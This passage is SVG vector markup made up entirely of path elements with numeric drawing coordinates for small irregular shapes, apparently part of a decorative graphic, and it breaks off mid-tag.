d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path 